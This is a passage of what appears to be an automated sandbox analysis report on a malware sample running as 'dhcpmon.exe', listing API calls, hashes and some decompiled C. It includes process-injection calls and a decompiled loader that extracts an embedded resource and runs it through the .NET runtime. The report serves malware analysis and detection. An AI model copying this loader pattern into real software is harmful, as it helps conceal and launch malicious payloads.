                • CreateProcessW.KERNELBASE(?,00000000), ref: 02850373
                • GetThreadContext.KERNELBASE(?,00010007), ref: 02850396
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 028503BA
                Memory Dump Source
                • Source File: 0000000F.00000002.324036287.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                Similarity
                • API ID: Process$ContextCreateMemoryReadThread
                • String ID:
                • API String ID: 2411489757-0
                • Opcode ID: 37fd24b7046834f30630d687929405461260d361fc1990b34cc06047163f4ab3
                • Instruction ID: 238089be7aa42479bc7d718b2395bc3cd887f115752feb2d1c76d20c76b120b8
                • Opcode Fuzzy Hash: 37fd24b7046834f30630d687929405461260d361fc1990b34cc06047163f4ab3
                • Instruction Fuzzy Hash: 73322839D40228EEEB60CBA4DC45FEDB7B5BF48705F20449AE908FA2A0D7745A80CF15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0285101F, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02851044
                Memory Dump Source
                • Source File: 0000000F.00000002.324036287.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction ID: 2fb9e06386086c284120f116ed393f0480e7b20a885c0e26c1611a96fcce98fa
                • Opcode Fuzzy Hash: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction Fuzzy Hash: 3BD05EB9C5030CBFCB00EFE1C846C9DBF7DEB10742F10819AAC00A7204EA759B109A51
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Analysis Process: dhcpmon.exe PID: 6816 Parent PID: 6600 dhcpmon.exeCOMMON

                Executed Functions

                Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                0x00401e22
                0x00401e28

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                0x0040149f
                0x004014a5
                0x004014a9
                0x004014ec
                0x004014ee
                0x004014ee
                0x004014b7
                0x004014bb
                0x004014c7
                0x004014cd
                0x004014d3
                0x004014d8
                0x004014e0
                0x004014e0
                0x004014d8
                0x004014e6
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v4.0.30319
                • API String ID: 2372384083-3152434051
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0254B6C0, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 0254B730
                • GetCurrentThread.KERNEL32 ref: 0254B76D
                • GetCurrentProcess.KERNEL32 ref: 0254B7AA
                • GetCurrentThreadId.KERNEL32 ref: 0254B803
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 3a837df32316cd02d43adf7452dccd1b15e1dff7674a57e4e971c09ab5a01b20
                • Instruction ID: 5eae03a521b3f765cd0bb874cbbf92f70269e404121d1e239d9c5055dcd9dce7
                • Opcode Fuzzy Hash: 3a837df32316cd02d43adf7452dccd1b15e1dff7674a57e4e971c09ab5a01b20
                • Instruction Fuzzy Hash: EA5137B4D047888FDB10CFA9D588BEEBBF0BB49308F208459E419A7350DB34A945CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0254B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 0254B730
                • GetCurrentThread.KERNEL32 ref: 0254B76D
                • GetCurrentProcess.KERNEL32 ref: 0254B7AA
                • GetCurrentThreadId.KERNEL32 ref: 0254B803
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: a6f6c7542b5da34d75e7662d224b08ccbe9e5ab049b9b2a38a73f8251a809754
                • Instruction ID: fef8e6090d93fa5e1a72608874bccf6776fe982e93dcc84ed8273035f21e5bc4
                • Opcode Fuzzy Hash: a6f6c7542b5da34d75e7662d224b08ccbe9e5ab049b9b2a38a73f8251a809754
                • Instruction Fuzzy Hash: BD5134B0D007888FDB10CFA9D588BAEBBF4FB48318F208559E419A7360DB74A945CF65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B17E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 255e05f73fd459f1f76fa9a4a9ad1af25d1b566fd610dd8d5369fce4ca815d78
                • Instruction ID: 14f875a6d8eda6587ee8c5cde619160f130d9373d51d92002b6732400edfc33f
                • Opcode Fuzzy Hash: 255e05f73fd459f1f76fa9a4a9ad1af25d1b566fd610dd8d5369fce4ca815d78
                • Instruction Fuzzy Hash: 6522D478E04205DFEB14CB94D598AFEB772FF89300F26C555D422AB364C7B4A885CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025493E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0254962E
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: a89f98ba0e03ebbc9a9400aebdd5cafd777d90bc9eafc404c66dca264ba3249d
                • Instruction ID: e7cfd44fa2a3b292994cd38dac6d06d9239670a4a4afb86266cec56f525115c9
                • Opcode Fuzzy Hash: a89f98ba0e03ebbc9a9400aebdd5cafd777d90bc9eafc404c66dca264ba3249d
                • Instruction Fuzzy Hash: 0B712670A00B058FD764DF69D455B9BFBF1BF88208F00892AD59AD7A40DB35E806CF95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0254FBEE, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0254FD0A
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: c0d7759b2d7dbbce6b50639df6cb5fee1916a623fcbdbc266af988204aef73a6
                • Instruction ID: c0cbc97507e9961ea83c83b11bfce89e7cdbdab1c8d7540af4dc1c7c10575c08
                • Opcode Fuzzy Hash: c0d7759b2d7dbbce6b50639df6cb5fee1916a623fcbdbc266af988204aef73a6
                • Instruction Fuzzy Hash: 5651CFB1D003499FDF14CFA9C884ADEFBB5BF48304F25852AE819AB210D7749946CF94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0254FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0254FD0A
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 749b7460bed15e619e3e214e7496a0c6de3948fb70ff888a38f756e6f4f9c6c2
                • Instruction ID: 31cf79655278b28e8d5e0698eb8451c9d874a2070949adb1edf9d2bd1a2d0893
                • Opcode Fuzzy Hash: 749b7460bed15e619e3e214e7496a0c6de3948fb70ff888a38f756e6f4f9c6c2
                • Instruction Fuzzy Hash: 89419EB1D003499FDF14CFA9C884ADEFBB5BF48314F24852AE819AB250DB749985CF94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B45F5, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 051B46B1
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: f527e3dbce57a453fa06232cb6533a18f268d9cee7d4bfef22809d50f9ce432b
                • Instruction ID: 40d8f44092067755618bcf40d1ef30115ef1159cafa91eb06e45b4f67d601390
                • Opcode Fuzzy Hash: f527e3dbce57a453fa06232cb6533a18f268d9cee7d4bfef22809d50f9ce432b
                • Instruction Fuzzy Hash: 004103B1C04658CFDF25CFA9C884BDDBBB2BF49304F20845AD508AB255D7B4594ACFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B3474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 051B46B1
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 6f465f675e76d5d7139a9116c15447accafc9a554a56a8780ab9da50749a0fc5
                • Instruction ID: d462414f9d390f54967e953fd0ff49e406ccd482e9e3b4bfc9002e7949eeb29a
                • Opcode Fuzzy Hash: 6f465f675e76d5d7139a9116c15447accafc9a554a56a8780ab9da50749a0fc5
                • Instruction Fuzzy Hash: 9941F1B1C0465CCBDF24DFA9C884BDEBBB6BF49308F208469D509AB251D7B46946CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B2470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                Download Yara Rule
                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 051B2531
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: fa8f476f05ccb93692d287cf1372af107c02aa5d3c541107869a614ae41cfc36
                • Instruction ID: 1d9a03df811284e19d832543bc1cb88c0f6f646b959f65d12cd5db0c047bbea0
                • Opcode Fuzzy Hash: fa8f476f05ccb93692d287cf1372af107c02aa5d3c541107869a614ae41cfc36
                • Instruction Fuzzy Hash: 0B4118B8A007458FDB14CF99C488BEABBF6FB88314F14C459D529AB321D774A945CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BB888, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051BB957
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 9d78155367c30a313fc623deabcc2c6ca3baa79870a1cd0041e7bd4c478d777f
                • Instruction ID: f01d9945dd00a335c99b632280c7eb9a835b5055e5e7fe138ed820d631fc9a14
                • Opcode Fuzzy Hash: 9d78155367c30a313fc623deabcc2c6ca3baa79870a1cd0041e7bd4c478d777f
                • Instruction Fuzzy Hash: 4C31AD72908389AFDB11CFA9D840ADEBFF8EF09210F14845AF554A7221C334D954DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 053904C8, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: af15e1e1cfbed19f9a2c0b1e799d0f6c41043c960e407a2599d5dc54786f6868
                • Instruction ID: c8da55c1731ded9a56c4c101540a9a2ed790518e843c52196efd89aac142a4b0
                • Opcode Fuzzy Hash: af15e1e1cfbed19f9a2c0b1e799d0f6c41043c960e407a2599d5dc54786f6868
                • Instruction Fuzzy Hash: F9318CB4A08258CFDF18CFA9D848AEDBBF1BF49314F058099E415AB361C7749844CF64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0254BCF8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0254BD87
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 62727da111e6d433b6d70add54180477f90b8574762d65d0814fac3de963ee78
                • Instruction ID: 66a6afc7096f9ce6a89fdfa9decb0ed627f3cfc3b8ce4c0bb14edcbc370a79e5
                • Opcode Fuzzy Hash: 62727da111e6d433b6d70add54180477f90b8574762d65d0814fac3de963ee78
                • Instruction Fuzzy Hash: 8F21E2B5D002499FDB10CFA9D584AEEFBF4FB48314F14845AE969A7310C378A946CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0254BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0254BD87
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 0ff11eaaf0cf553d1f3591bd9ace84b491d5d4f45f16e484ef0fd0d4c80d8a22
                • Instruction ID: 14508d73f57370a75e9f32209082a351ee91575d2cc18469250e6ef8dd22c804
                • Opcode Fuzzy Hash: 0ff11eaaf0cf553d1f3591bd9ace84b491d5d4f45f16e484ef0fd0d4c80d8a22
                • Instruction Fuzzy Hash: 7721E4B5D002489FDB10CFA9D884ADEFBF8FB48314F14845AE919A3310C378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BA4DF, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 5a8095b05fe62f4d50ac3fafac7f618db3c4c18008518dfb7c34c25d5b5e9b01
                • Instruction ID: ccb974e08ddb2a94844f56df8eb1706a0c0defe5d147ddaeeb1513359b174c67
                • Opcode Fuzzy Hash: 5a8095b05fe62f4d50ac3fafac7f618db3c4c18008518dfb7c34c25d5b5e9b01
                • Instruction Fuzzy Hash: 922153B6804249DFDB10CF99C884BEEBBF8EB48310F10881AE459A7300C378A6418FA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02547EE9, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                Download Yara Rule
                APIs
                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02547F5D
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: 7bb524445e5e85c7082fbbf4fe3202aab3eb179ec372b80d3d9a21b8bffee568
                • Instruction ID: ffedd9f37f9a35eec2834db4c79a4d859ce3fe0050e2a5c49cf4eeaf49eecf6b
                • Opcode Fuzzy Hash: 7bb524445e5e85c7082fbbf4fe3202aab3eb179ec372b80d3d9a21b8bffee568
                • Instruction Fuzzy Hash: 3D11AFB28047858FDB11CFA4D4483EEFFF4EB09314F44849AE895A7242C7789A46CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401489, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                APIs
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FindResource
                • String ID:
                • API String ID: 1635176832-0
                • Opcode ID: 3df545f459032f05f82f03ce3f77b6816ae03f6e200b67478aca7feb0449ef50
                • Instruction ID: 407907d87cbb6ff9fe390b1ec32cbc08c0ffb1da0b112ac5fc55b6e00c7f45a0
                • Opcode Fuzzy Hash: 3df545f459032f05f82f03ce3f77b6816ae03f6e200b67478aca7feb0449ef50
                • Instruction Fuzzy Hash: 3EF03C74A01304FBE7306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02548768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025496A9,00000800,00000000,00000000), ref: 025498BA
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 71b9f1ff39dee71ff922dec925787e67d4bdd4d9d5f2a780d45ab651d8fe951a
                • Instruction ID: a844993336a166d51b0b96e58040d92b18eef0726862f94aa35dd2f98cc231bc
                • Opcode Fuzzy Hash: 71b9f1ff39dee71ff922dec925787e67d4bdd4d9d5f2a780d45ab651d8fe951a
                • Instruction Fuzzy Hash: F011F2B69002498BDB10CF9AC444ADEFBF4AB88324F10842EE929B7600C774A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02549849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025496A9,00000800,00000000,00000000), ref: 025498BA
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 3d3832a687971835c21b6d913a19e6862dc8e07f0a480086cc01903049f0e669
                • Instruction ID: 88d545c3eb999d7abbaf84f44ac34972de38df340975bd65b99d499dee9c5da0
                • Opcode Fuzzy Hash: 3d3832a687971835c21b6d913a19e6862dc8e07f0a480086cc01903049f0e669
                • Instruction Fuzzy Hash: 3E1114B2D002498FDB10CF99D484ADEFBF4FB88314F14852EE529A7600C374A546CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BB8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051BB957
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 22f2ac132c78a3db0d2cddf0443dbf328cb84cf7446d82cd47d38204d8a3c6f5
                • Instruction ID: bbeff6b789171a48620854f0fa51d8058f24985a05341fdda140d112e703ac57
                • Opcode Fuzzy Hash: 22f2ac132c78a3db0d2cddf0443dbf328cb84cf7446d82cd47d38204d8a3c6f5
                • Instruction Fuzzy Hash: 3F1137B18042499FDB10CFA9C844BDEBFF8EB48310F14841AE565B7210C378A954DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B32D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,022653E8,00000000,?), ref: 051BE73D
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 8430af38de514f94b246e1155ad379860ea6129d282e351939234fce200ddeb1
                • Instruction ID: 5ddcb02c7289a84e70e78e81d5f10a39cec092df8d58bd7b5b597a011b4498d7
                • Opcode Fuzzy Hash: 8430af38de514f94b246e1155ad379860ea6129d282e351939234fce200ddeb1
                • Instruction Fuzzy Hash: E91128B5800749DFDB10CF99C485BEEBBF8EB48314F10841AE955A3240D378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BE6D8, Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,022653E8,00000000,?), ref: 051BE73D
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 78ce894efe2848637c08a7d129589e8b8570a701decd990e7be84529e8afb9e0
                • Instruction ID: 691c8ba9b729459a604dc5cf42827305b4377f10bde3cc5b2225ae471d819742
                • Opcode Fuzzy Hash: 78ce894efe2848637c08a7d129589e8b8570a701decd990e7be84529e8afb9e0
                • Instruction Fuzzy Hash: D51136B5800749DFDB10DFA9C485BEEBBF8FB09314F14845AE558A3200D378AA46DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BA548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 2c28f64377d280cbeff455216b74d4f495cb31ae2e34898c38bf950ad18efc7c
                • Instruction ID: 80ef70b6fe58821caae05448bd083aa5a57586e1d95d24a96238dfc746622815
                • Opcode Fuzzy Hash: 2c28f64377d280cbeff455216b74d4f495cb31ae2e34898c38bf950ad18efc7c
                • Instruction Fuzzy Hash: 0111E3B59047499FDB20CF99C584BDEBBF8EB48314F108859E959A7600C3B4A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B1540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051B226A,?,00000000,?), ref: 051BC435
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 81129fc976fb19df9197ee65c49d52103603e0440f2d57a4f8ab241fcbe538d9
                • Instruction ID: 573763dcd3564dc1c62839360748f28617fb3eb6768a708d24dde064d5fe5e50
                • Opcode Fuzzy Hash: 81129fc976fb19df9197ee65c49d52103603e0440f2d57a4f8ab241fcbe538d9
                • Instruction Fuzzy Hash: D311F5B58007499FDB10CF99C484BEEBBF8EB48314F108419E959A7600C3B4A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B50D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 6a7acbad578f022152978901495c4081a25ae3e1f7a8abc79a7e5a85ac573cbf
                • Instruction ID: 9d8bd237ea7d7a5be80dbbfa9b6b57fff1276f459f6225acae27c326724101bb
                • Opcode Fuzzy Hash: 6a7acbad578f022152978901495c4081a25ae3e1f7a8abc79a7e5a85ac573cbf
                • Instruction Fuzzy Hash: 051106B58007499FDB10CF99D584BDEBBF8EB48314F108459E919B7300C3B8A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025495C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0254962E
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 26fb27787fd8a1e6dbdd361a5282c92aef1459cce33bc2e9d4d06a5c6ac1b13e
                • Instruction ID: f06c75ef29c474ca62654b735c394db639229b210d2535299877a12457c4df3c
                • Opcode Fuzzy Hash: 26fb27787fd8a1e6dbdd361a5282c92aef1459cce33bc2e9d4d06a5c6ac1b13e
                • Instruction Fuzzy Hash: 0111E3B5D006898FCB10CF9AC445BDFFBF4AB88218F10855AD829A7600C774A546CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05396838, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05396890
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 5df910815488a4d3e23923f44e67ffb2b2456b8e09040b5cb2dc71c4a8f29766
                • Instruction ID: 07f17b710702c3ea5a9bb50b1f5740acba4bd62af1c6ffd5346f7af2c75e30b0
                • Opcode Fuzzy Hash: 5df910815488a4d3e23923f44e67ffb2b2456b8e09040b5cb2dc71c4a8f29766
                • Instruction Fuzzy Hash: F51115B58047498FCB20CF99C485BDEBBF4EB48324F10842AD969A7340D778A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05396832, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05396890
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
